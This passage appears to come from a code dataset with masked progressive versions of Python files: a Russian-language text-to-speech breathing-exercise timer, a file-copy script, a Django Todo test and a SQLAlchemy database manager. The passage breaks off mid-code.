def __init__(self, rounds=3, breaths=30, hold=15):
self.rounds = rounds
self.breaths = breaths
self.hold = hold
self.round_times = []
self.lock = threading.Lock()
def __str__(self):
return '\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)
def __hold_breath(self):
start_time = time.time()
input()
seconds = int(time.time() - start_time)
mins = seconds // 60
secs = seconds % 60
self.round_times.append('{:02}:{:02}'.format(mins, secs))
play_wav_inline('inhale')
self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(
mins, secs)))
def __clock_tick(self):
for i in range(self.hold):
            if i < self.hold - 3:
time.sleep(1)
else:
play_wav('clock')
play_wav_inline('gong2')
def __breathe_round(self, round):
self.say('Раунд ' + str(round))
for i in range(self.breaths):
if i % 10 == 0:
play_wav_inline('gong')
play_wav('inhale')
print(i + 1, end=' ')
play_wav('exhale')
print()
self.say('Задерживаем дыхание на выдохе')
self.__hold_breath()
self.__clock_tick()
play_wav_inline('exhale')
self.say('Выдох')
time.sleep(1)
def breathe(self):
self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))
self.say('Каждый раунд это ' + nums(str(self.breaths) +
' глубокий вдох - и спокойный выдох'))
self.say('Приготовились...')
for i in range(self.rounds):
self.__breathe_round(i + 1)
self.say('Восстанавливаем дыхание.')
def statistics(self):
print('=============')
for i in range(len(self.round_times)):
            print('Раунд', i + 1, self.round_times[i])
print('=============')
def say(self, what):
self.lock.acquire()
thread = threading.Thread(target=speak, kwargs={'what': what})
thread.start()
thread.join()
self.lock.release()
<mask token>
| <mask token>
def play_wav(src):
wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav')
wav.play()
time.sleep(wav.duration)
<mask token>
def nums(phrase, morph=pymorphy2.MorphAnalyzer()):
""" согласование существительных с числительными, стоящими перед ними """
phrase = phrase.replace(' ', ' ').replace(',', ' ,')
numeral = ''
new_phrase = []
for word in phrase.split(' '):
if 'NUMB' in morph.parse(word)[0].tag:
numeral = word
if numeral:
word = str(morph.parse(word)[0].make_agree_with_number(abs(int(
numeral))).word)
new_phrase.append(word)
return ' '.join(new_phrase).replace(' ,', ',')
<mask token>
class Workout:
def __init__(self, rounds=3, breaths=30, hold=15):
self.rounds = rounds
self.breaths = breaths
self.hold = hold
self.round_times = []
self.lock = threading.Lock()
def __str__(self):
return '\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)
def __hold_breath(self):
start_time = time.time()
input()
seconds = int(time.time() - start_time)
mins = seconds // 60
secs = seconds % 60
self.round_times.append('{:02}:{:02}'.format(mins, secs))
play_wav_inline('inhale')
self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(
mins, secs)))
def __clock_tick(self):
for i in range(self.hold):
            if i < self.hold - 3:
time.sleep(1)
else:
play_wav('clock')
play_wav_inline('gong2')
def __breathe_round(self, round):
self.say('Раунд ' + str(round))
for i in range(self.breaths):
if i % 10 == 0:
play_wav_inline('gong')
play_wav('inhale')
print(i + 1, end=' ')
play_wav('exhale')
print()
self.say('Задерживаем дыхание на выдохе')
self.__hold_breath()
self.__clock_tick()
play_wav_inline('exhale')
self.say('Выдох')
time.sleep(1)
def breathe(self):
self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))
self.say('Каждый раунд это ' + nums(str(self.breaths) +
' глубокий вдох - и спокойный выдох'))
self.say('Приготовились...')
for i in range(self.rounds):
self.__breathe_round(i + 1)
self.say('Восстанавливаем дыхание.')
def statistics(self):
print('=============')
for i in range(len(self.round_times)):
            print('Раунд', i + 1, self.round_times[i])
print('=============')
def say(self, what):
self.lock.acquire()
thread = threading.Thread(target=speak, kwargs={'what': what})
thread.start()
thread.join()
self.lock.release()
<mask token>
| <mask token>
warnings.filterwarnings('ignore')
<mask token>
def play_wav(src):
wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav')
wav.play()
time.sleep(wav.duration)
def play_wav_inline(src):
wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav')
wav.play()
def correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):
new_phrase = []
py_gen = 1
phrase = phrase.split(' ')
while phrase:
word = phrase.pop(-1)
if 'NUMB' in morph.parse(word)[0].tag:
new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))
else:
new_phrase.append(word)
py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0
].tag else pytils.numeral.MALE
return ' '.join(new_phrase[::-1])
def nums(phrase, morph=pymorphy2.MorphAnalyzer()):
""" согласование существительных с числительными, стоящими перед ними """
phrase = phrase.replace(' ', ' ').replace(',', ' ,')
numeral = ''
new_phrase = []
for word in phrase.split(' '):
if 'NUMB' in morph.parse(word)[0].tag:
numeral = word
if numeral:
word = str(morph.parse(word)[0].make_agree_with_number(abs(int(
numeral))).word)
new_phrase.append(word)
return ' '.join(new_phrase).replace(' ,', ',')
def speak(what):
speech_voice = 3
rate = 120
tts = pyttsx3.init()
voices = tts.getProperty('voices')
tts.setProperty('rate', rate)
tts.setProperty('voice', voices[speech_voice].id)
print('🔊', what)
what = correct_numerals(what)
tts.say(what)
tts.runAndWait()
class Workout:
def __init__(self, rounds=3, breaths=30, hold=15):
self.rounds = rounds
self.breaths = breaths
self.hold = hold
self.round_times = []
self.lock = threading.Lock()
def __str__(self):
return '\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)
def __hold_breath(self):
start_time = time.time()
input()
seconds = int(time.time() - start_time)
mins = seconds // 60
secs = seconds % 60
self.round_times.append('{:02}:{:02}'.format(mins, secs))
play_wav_inline('inhale')
self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(
mins, secs)))
def __clock_tick(self):
for i in range(self.hold):
            if i < self.hold - 3:
time.sleep(1)
else:
play_wav('clock')
play_wav_inline('gong2')
def __breathe_round(self, round):
self.say('Раунд ' + str(round))
for i in range(self.breaths):
if i % 10 == 0:
play_wav_inline('gong')
play_wav('inhale')
print(i + 1, end=' ')
play_wav('exhale')
print()
self.say('Задерживаем дыхание на выдохе')
self.__hold_breath()
self.__clock_tick()
play_wav_inline('exhale')
self.say('Выдох')
time.sleep(1)
def breathe(self):
self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))
self.say('Каждый раунд это ' + nums(str(self.breaths) +
' глубокий вдох - и спокойный выдох'))
self.say('Приготовились...')
for i in range(self.rounds):
self.__breathe_round(i + 1)
self.say('Восстанавливаем дыхание.')
def statistics(self):
print('=============')
for i in range(len(self.round_times)):
            print('Раунд', i + 1, self.round_times[i])
print('=============')
def say(self, what):
self.lock.acquire()
thread = threading.Thread(target=speak, kwargs={'what': what})
thread.start()
thread.join()
self.lock.release()
<mask token>
workout.breathe()
workout.statistics()
| <mask token>
warnings.filterwarnings('ignore')
<mask token>
rounds, breaths, hold = 4, 30, 13
def play_wav(src):
wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav')
wav.play()
time.sleep(wav.duration)
def play_wav_inline(src):
wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav')
wav.play()
def correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):
new_phrase = []
py_gen = 1
phrase = phrase.split(' ')
while phrase:
word = phrase.pop(-1)
if 'NUMB' in morph.parse(word)[0].tag:
new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))
else:
new_phrase.append(word)
py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0
].tag else pytils.numeral.MALE
return ' '.join(new_phrase[::-1])
def nums(phrase, morph=pymorphy2.MorphAnalyzer()):
""" согласование существительных с числительными, стоящими перед ними """
phrase = phrase.replace(' ', ' ').replace(',', ' ,')
numeral = ''
new_phrase = []
for word in phrase.split(' '):
if 'NUMB' in morph.parse(word)[0].tag:
numeral = word
if numeral:
word = str(morph.parse(word)[0].make_agree_with_number(abs(int(
numeral))).word)
new_phrase.append(word)
return ' '.join(new_phrase).replace(' ,', ',')
def speak(what):
speech_voice = 3
rate = 120
tts = pyttsx3.init()
voices = tts.getProperty('voices')
tts.setProperty('rate', rate)
tts.setProperty('voice', voices[speech_voice].id)
print('🔊', what)
what = correct_numerals(what)
tts.say(what)
tts.runAndWait()
class Workout:
def __init__(self, rounds=3, breaths=30, hold=15):
self.rounds = rounds
self.breaths = breaths
self.hold = hold
self.round_times = []
self.lock = threading.Lock()
def __str__(self):
return '\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)
def __hold_breath(self):
start_time = time.time()
input()
seconds = int(time.time() - start_time)
mins = seconds // 60
secs = seconds % 60
self.round_times.append('{:02}:{:02}'.format(mins, secs))
play_wav_inline('inhale')
self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(
mins, secs)))
def __clock_tick(self):
for i in range(self.hold):
            if i < self.hold - 3:
time.sleep(1)
else:
play_wav('clock')
play_wav_inline('gong2')
def __breathe_round(self, round):
self.say('Раунд ' + str(round))
for i in range(self.breaths):
if i % 10 == 0:
play_wav_inline('gong')
play_wav('inhale')
print(i + 1, end=' ')
play_wav('exhale')
print()
self.say('Задерживаем дыхание на выдохе')
self.__hold_breath()
self.__clock_tick()
play_wav_inline('exhale')
self.say('Выдох')
time.sleep(1)
def breathe(self):
self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))
self.say('Каждый раунд это ' + nums(str(self.breaths) +
' глубокий вдох - и спокойный выдох'))
self.say('Приготовились...')
for i in range(self.rounds):
self.__breathe_round(i + 1)
self.say('Восстанавливаем дыхание.')
def statistics(self):
print('=============')
for i in range(len(self.round_times)):
print('Раунд', i, self.round_times[i])
print('=============')
def say(self, what):
self.lock.acquire()
thread = threading.Thread(target=speak, kwargs={'what': what})
thread.start()
thread.join()
self.lock.release()
workout = Workout(rounds, breaths, hold)
workout.breathe()
workout.statistics()
| import sys
import time
import pymorphy2
import pyglet
import pyttsx3
import threading
import warnings
import pytils
warnings.filterwarnings("ignore")
""" Количество раундов, вдохов в раунде, задержка дыхания на вдохе"""
rounds, breaths, hold = 4, 30, 13
def play_wav(src):
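    # Blocking playback: sleeps for the clip's duration so audio cues don't overlap.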
wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav')
wav.play()
time.sleep(wav.duration)
def play_wav_inline(src):
wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav')
wav.play()
def correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):
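    # Walk the phrase from the end so each numeral takes its grammatical gender
    # from the word that follows it (pytils needs MALE/FEMALE to spell it out).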
new_phrase = []
py_gen = 1
phrase = phrase.split(' ')
while phrase:
word = phrase.pop(-1)
if 'NUMB' in morph.parse(word)[0].tag:
new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))
else:
new_phrase.append(word)
py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0].tag else pytils.numeral.MALE
return ' '.join(new_phrase[::-1])
def nums(phrase, morph=pymorphy2.MorphAnalyzer()):
""" согласование существительных с числительными, стоящими перед ними """
phrase = phrase.replace(' ', ' ').replace(',', ' ,')
numeral = ''
new_phrase = []
for word in phrase.split(' '):
if 'NUMB' in morph.parse(word)[0].tag:
numeral = word
if numeral:
word = str(morph.parse(word)[0].make_agree_with_number(abs(int(numeral))).word)
new_phrase.append(word)
return ' '.join(new_phrase).replace(' ,', ',')
def speak(what):
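    # One-shot pyttsx3 utterance; numerals are expanded to words first so the
    # selected voice reads them naturally.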
    speech_voice = 3  # voice engine (index into the installed voices)
rate = 120
tts = pyttsx3.init()
voices = tts.getProperty("voices")
tts.setProperty('rate', rate)
tts.setProperty("voice", voices[speech_voice].id)
print('🔊', what)
what = correct_numerals(what)
tts.say(what)
tts.runAndWait()
# tts.stop()
class Workout:
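    # One breathing session: `rounds` rounds of `breaths` deep breaths, each
    # followed by a user-timed exhale-hold and a fixed inhale-hold.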
def __init__(self, rounds=3, breaths=30, hold=15):
self.rounds = rounds
self.breaths = breaths
self.hold = hold
self.round_times = []
        self.lock = threading.Lock()  # mutual exclusion between individual speech threads
def __str__(self):
return '\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)
def __hold_breath(self):
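        # The user presses Enter to end the exhale-hold; the elapsed time is
        # recorded and announced.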
start_time = time.time()
input()
seconds = int(time.time() - start_time)
mins = seconds // 60
secs = seconds % 60
self.round_times.append('{:02}:{:02}'.format(mins, secs))
play_wav_inline('inhale')
self.say('Глубокий вдох. ' + nums("{} минута {} секунда".format(mins, secs)))
def __clock_tick(self):
for i in range(self.hold):
            if i < self.hold - 3:
time.sleep(1)
else:
play_wav('clock')
play_wav_inline('gong2')
def __breathe_round(self, round):
self.say('Раунд ' + str(round))
for i in range(self.breaths):
if i % 10 == 0:
play_wav_inline('gong')
play_wav('inhale')
print(i + 1, end=' ')
play_wav('exhale')
print()
self.say('Задерживаем дыхание на выдохе')
self.__hold_breath()
# self.say('Держим ' + nums(str(self.hold) + ' секунда'))
self.__clock_tick()
play_wav_inline('exhale')
self.say('Выдох')
time.sleep(1)
def breathe(self):
self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))
self.say('Каждый раунд это ' + nums(str(self.breaths) + ' глубокий вдох - и спокойный выдох'))
self.say('Приготовились...')
for i in range(self.rounds):
self.__breathe_round(i + 1)
self.say('Восстанавливаем дыхание.')
def statistics(self):
print('=============')
for i in range(len(self.round_times)):
print('Раунд', i, self.round_times[i])
print('=============')
def say(self, what):
self.lock.acquire()
thread = threading.Thread(target=speak, kwargs={'what': what})
thread.start()
thread.join()
self.lock.release()
workout = Workout(rounds, breaths, hold)
workout.breathe()
workout.statistics()
| [
10,
11,
15,
16,
18
] |
36 | 4f0933c58aa1d41faf4f949d9684c04f9e01b473 | <mask token>
| <mask token>
print(f'copying from {from_file} to {to_file}')
<mask token>
print(f'the input file is {len(indata)} bytes long')
print(f'does the output file exist? {exists(to_file)}')
print('return to continue, CTRL-C to abort')
input('?')
open(to_file, 'w').write(indata)
print('done!')
| <mask token>
from_file = input('from_file')
to_file = input('to_file')
print(f'copying from {from_file} to {to_file}')
indata = open(from_file).read()
print(f'the input file is {len(indata)} bytes long')
print(f'does the output file exist? {exists(to_file)}')
print('return to continue, CTRL-C to abort')
input('?')
open(to_file, 'w').write(indata)
print('done!')
| from os.path import exists
from_file = input('from_file')
to_file = input('to_file')
print(f'copying from {from_file} to {to_file}')
indata = open(from_file).read()
print(f'the input file is {len(indata)} bytes long')
print(f'does the output file exist? {exists(to_file)}')
print('return to continue, CTRL-C to abort')
input('?')
open(to_file, 'w').write(indata)
print('done!')
| from os.path import exists
from_file = input('from_file')
to_file = input('to_file')
print(f"copying from {from_file} to {to_file}")
indata = open(from_file).read()  # reading the file this way, no explicit close is needed
print(f"the input file is {len(indata)} bytes long")
print(f"does the output file exist? {exists(to_file)}")
print("return to continue, CTRL-C to abort")
input('?')
open(to_file,'w').write(indata)  # no explicit close needed
print("done!")
| [
0,
1,
2,
3,
4
] |
37 | 5c81ddbc8f5a162949a100dbef1c69551d9e267a | <mask token>
class MyTestCase(TestCase):
<mask token>
<mask token>
| <mask token>
class MyTestCase(TestCase):
def test_mark_done(self):
user = User.objects.create_user(email='user@…', username='user',
password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)
res = todo.mark_done(user)
self.assertTrue(res)
self.assertEqual(Todo.objects.count(), 1)
<mask token>
| <mask token>
class MyTestCase(TestCase):
def test_mark_done(self):
user = User.objects.create_user(email='user@…', username='user',
password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)
res = todo.mark_done(user)
self.assertTrue(res)
self.assertEqual(Todo.objects.count(), 1)
def test_mark_done_already_done(self):
user = User.objects.create_user(email='user@…', username='user',
password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', is_done=
True, done_by=user, owner=user)
res = todo.mark_done(user)
self.assertIsNone(res)
self.assertEqual(Todo.objects.count(), 0)
| from django.test import TestCase
from django.contrib.auth.models import User
from ..models import Todo
class MyTestCase(TestCase):
def test_mark_done(self):
user = User.objects.create_user(email='user@…', username='user',
password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)
res = todo.mark_done(user)
self.assertTrue(res)
self.assertEqual(Todo.objects.count(), 1)
def test_mark_done_already_done(self):
user = User.objects.create_user(email='user@…', username='user',
password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', is_done=
True, done_by=user, owner=user)
res = todo.mark_done(user)
self.assertIsNone(res)
self.assertEqual(Todo.objects.count(), 0)
| # -*- coding: utf-8 -*-
from django.test import TestCase
from django.contrib.auth.models import User
from ..models import Todo
class MyTestCase(TestCase):
def test_mark_done(self):
user = User.objects.create_user(email='user@…', username='user', password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)
res = todo.mark_done(user)
self.assertTrue(res)
self.assertEqual(Todo.objects.count(), 1)
def test_mark_done_already_done(self):
user = User.objects.create_user(email='user@…', username='user', password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', is_done=True, done_by=user, owner=user)
res = todo.mark_done(user)
self.assertIsNone(res)
# todo not saved because mark_done don't save already done todos
self.assertEqual(Todo.objects.count(), 0)
| [
1,
2,
3,
4,
5
] |
38 | 509129052f97bb32b4ba0e71ecd7b1061d5f8da2 | <mask token>
| print(180 / 4)
| print (180 / 4) | null | null | [
0,
1,
2
] |
39 | 2c90c4e0b42a75d6d387b9b2d0118d8e991b5a08 | <mask token>
class BaseDBMgr:
def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),
field: tuple=(), page: int=1, per_page: int=10) ->dict:
"""获取分页数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int page 页码
@param int per_page 每页数据数量
@return dict
"""
res = {'page': {'current_page': page, 'per_page': per_page,
'total_page': 0, 'count': 0}, 'items': []}
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
res['page']['count'] = query.count()
res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)
for order in orders:
            order_field, sort = order
            sort = 'desc' if sort not in ['asc', 'desc'] else sort
            query = query.order_by(text(f'{order_field} {sort}'))
data = query.offset((page - 1) * per_page).limit(per_page)
if not field:
res['items'] = [item.to_dict() for item in data]
else:
res['items'] = [item.to_dict(only=field) for item in data]
return res
<mask token>
def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(
), field: tuple=()) ->dict:
"""获取所有满足条件的第一条数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@return dict
"""
items = self.get_all(cls_, filters, orders, field, limit=1)
return items[0] if items else None
def add(self, cls_: BaseMixin, data: dict) ->int:
"""插入一条数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@return int 插入数据的主键
"""
item = cls_(**data)
db.add(item)
db.flush()
return item.id
<mask token>
def delete(self, cls_: BaseMixin, filters: set) ->int:
"""更新数据
@param BaseMixin cls 数据库模型实体类
@param set filters 过滤条件
@return int 影响的行数
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
items = query.filter(cls_.deleted_at == 0).all()
for item in items:
item.delete()
affect_rows = len(items)
else:
affect_rows = query.filter(*filters).delete(synchronize_session
=False)
db.commit()
return affect_rows
<mask token>
| <mask token>
class BaseDBMgr:
def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),
field: tuple=(), page: int=1, per_page: int=10) ->dict:
"""获取分页数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int page 页码
@param int per_page 每页数据数量
@return dict
"""
res = {'page': {'current_page': page, 'per_page': per_page,
'total_page': 0, 'count': 0}, 'items': []}
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
res['page']['count'] = query.count()
res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)
for order in orders:
            order_field, sort = order
            sort = 'desc' if sort not in ['asc', 'desc'] else sort
            query = query.order_by(text(f'{order_field} {sort}'))
data = query.offset((page - 1) * per_page).limit(per_page)
if not field:
res['items'] = [item.to_dict() for item in data]
else:
res['items'] = [item.to_dict(only=field) for item in data]
return res
def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),
field: tuple=(), limit: int=0) ->list:
"""获取所有满足条件的数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int limit 取数据最大数量
@return list
"""
query = db.query(cls_)
if filters:
query = query.filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
for order in orders:
            order_field, sort = order
            sort = 'desc' if sort not in ['asc', 'desc'] else sort
            query = query.order_by(text(f'{order_field} {sort}'))
if limit != 0:
query = query.limit(limit)
        items = query.all()
if not field:
items = [item.to_dict() for item in items]
else:
items = [item.to_dict(only=field) for item in items]
return items
def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(
), field: tuple=()) ->dict:
"""获取所有满足条件的第一条数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@return dict
"""
items = self.get_all(cls_, filters, orders, field, limit=1)
return items[0] if items else None
def add(self, cls_: BaseMixin, data: dict) ->int:
"""插入一条数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@return int 插入数据的主键
"""
item = cls_(**data)
db.add(item)
db.flush()
return item.id
def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:
"""更新数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@param set filters 过滤条件
@return int 影响的行数
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
return query.update(data, synchronize_session=False)
def delete(self, cls_: BaseMixin, filters: set) ->int:
"""更新数据
@param BaseMixin cls 数据库模型实体类
@param set filters 过滤条件
@return int 影响的行数
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
items = query.filter(cls_.deleted_at == 0).all()
for item in items:
item.delete()
affect_rows = len(items)
else:
affect_rows = query.filter(*filters).delete(synchronize_session
=False)
db.commit()
return affect_rows
<mask token>
| <mask token>
class BaseDBMgr:
def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),
field: tuple=(), page: int=1, per_page: int=10) ->dict:
"""获取分页数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int page 页码
@param int per_page 每页数据数量
@return dict
"""
res = {'page': {'current_page': page, 'per_page': per_page,
'total_page': 0, 'count': 0}, 'items': []}
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
res['page']['count'] = query.count()
res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)
for order in orders:
            order_field, sort = order
            sort = 'desc' if sort not in ['asc', 'desc'] else sort
            query = query.order_by(text(f'{order_field} {sort}'))
data = query.offset((page - 1) * per_page).limit(per_page)
if not field:
res['items'] = [item.to_dict() for item in data]
else:
res['items'] = [item.to_dict(only=field) for item in data]
return res
def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),
field: tuple=(), limit: int=0) ->list:
"""获取所有满足条件的数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int limit 取数据最大数量
@return list
"""
query = db.query(cls_)
if filters:
query = query.filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
for order in orders:
            order_field, sort = order
            sort = 'desc' if sort not in ['asc', 'desc'] else sort
            query = query.order_by(text(f'{order_field} {sort}'))
if limit != 0:
query = query.limit(limit)
        items = query.all()
if not field:
items = [item.to_dict() for item in items]
else:
items = [item.to_dict(only=field) for item in items]
return items
def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(
), field: tuple=()) ->dict:
"""获取所有满足条件的第一条数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@return dict
"""
items = self.get_all(cls_, filters, orders, field, limit=1)
return items[0] if items else None
def add(self, cls_: BaseMixin, data: dict) ->int:
"""插入一条数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@return int 插入数据的主键
"""
item = cls_(**data)
db.add(item)
db.flush()
return item.id
def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:
"""更新数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@param set filters 过滤条件
@return int 影响的行数
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
return query.update(data, synchronize_session=False)
def delete(self, cls_: BaseMixin, filters: set) ->int:
"""更新数据
@param BaseMixin cls 数据库模型实体类
@param set filters 过滤条件
@return int 影响的行数
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
items = query.filter(cls_.deleted_at == 0).all()
for item in items:
item.delete()
affect_rows = len(items)
else:
affect_rows = query.filter(*filters).delete(synchronize_session
=False)
db.commit()
return affect_rows
def count(self, cls_: BaseMixin, filters: set, field=None) ->int:
"""获取满足条件的总行数
@param BaseMixin cls 数据库模型实体类
@param set filters 过滤条件
@param string|None field 统计的字段
@return int
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
if field is None:
return query.count()
else:
return query.count(field)
| import math
import decimal
from typing import Union, List, Tuple
from sqlalchemy import text
from .model import BaseMixin
from ..core.db import db
Orders = List[Tuple[str, Union[str, int, decimal.Decimal]]]
class BaseDBMgr:
def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),
field: tuple=(), page: int=1, per_page: int=10) ->dict:
"""获取分页数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int page 页码
@param int per_page 每页数据数量
@return dict
"""
res = {'page': {'current_page': page, 'per_page': per_page,
'total_page': 0, 'count': 0}, 'items': []}
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
res['page']['count'] = query.count()
res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)
for order in orders:
            order_field, sort = order
            sort = 'desc' if sort not in ['asc', 'desc'] else sort
            query = query.order_by(text(f'{order_field} {sort}'))
data = query.offset((page - 1) * per_page).limit(per_page)
if not field:
res['items'] = [item.to_dict() for item in data]
else:
res['items'] = [item.to_dict(only=field) for item in data]
return res
def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),
field: tuple=(), limit: int=0) ->list:
"""获取所有满足条件的数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int limit 取数据最大数量
@return list
"""
query = db.query(cls_)
if filters:
query = query.filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
for order in orders:
            order_field, sort = order
            sort = 'desc' if sort not in ['asc', 'desc'] else sort
            query = query.order_by(text(f'{order_field} {sort}'))
if limit != 0:
query = query.limit(limit)
        items = query.all()
if not field:
items = [item.to_dict() for item in items]
else:
items = [item.to_dict(only=field) for item in items]
return items
def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(
), field: tuple=()) ->dict:
"""获取所有满足条件的第一条数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@return dict
"""
items = self.get_all(cls_, filters, orders, field, limit=1)
return items[0] if items else None
def add(self, cls_: BaseMixin, data: dict) ->int:
"""插入一条数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@return int 插入数据的主键
"""
item = cls_(**data)
db.add(item)
db.flush()
return item.id
def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:
"""更新数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@param set filters 过滤条件
@return int 影响的行数
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
return query.update(data, synchronize_session=False)
def delete(self, cls_: BaseMixin, filters: set) ->int:
"""更新数据
@param BaseMixin cls 数据库模型实体类
@param set filters 过滤条件
@return int 影响的行数
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
items = query.filter(cls_.deleted_at == 0).all()
for item in items:
item.delete()
affect_rows = len(items)
else:
affect_rows = query.filter(*filters).delete(synchronize_session
=False)
db.commit()
return affect_rows
def count(self, cls_: BaseMixin, filters: set, field=None) ->int:
"""获取满足条件的总行数
@param BaseMixin cls 数据库模型实体类
@param set filters 过滤条件
@param string|None field 统计的字段
@return int
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
if field is None:
return query.count()
else:
return query.count(field)
| import math
import decimal
from typing import Union, List, Tuple
from sqlalchemy import text
from .model import BaseMixin
from ..core.db import db
Orders = List[Tuple[str, Union[str, int, decimal.Decimal]]]
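# Each entry pairs a column name with a sort direction, e.g. [('id', 'desc')].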
class BaseDBMgr:
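    # Generic CRUD helper over the shared SQLAlchemy session; models with a
    # deleted_at column are treated as soft-deleted and filtered out everywhere.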
def get_page(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=(), page:int=1, per_page:int=10)->dict:
        '''Fetch a page of data
        @param BaseMixin cls database model entity class
        @param set filters query conditions
        @param str order sort order
        @param tuple field fields to return
        @param int page page number
        @param int per_page number of rows per page
        @return dict
'''
res = {
'page': {
'current_page': page,
'per_page': per_page,
'total_page': 0,
'count': 0,
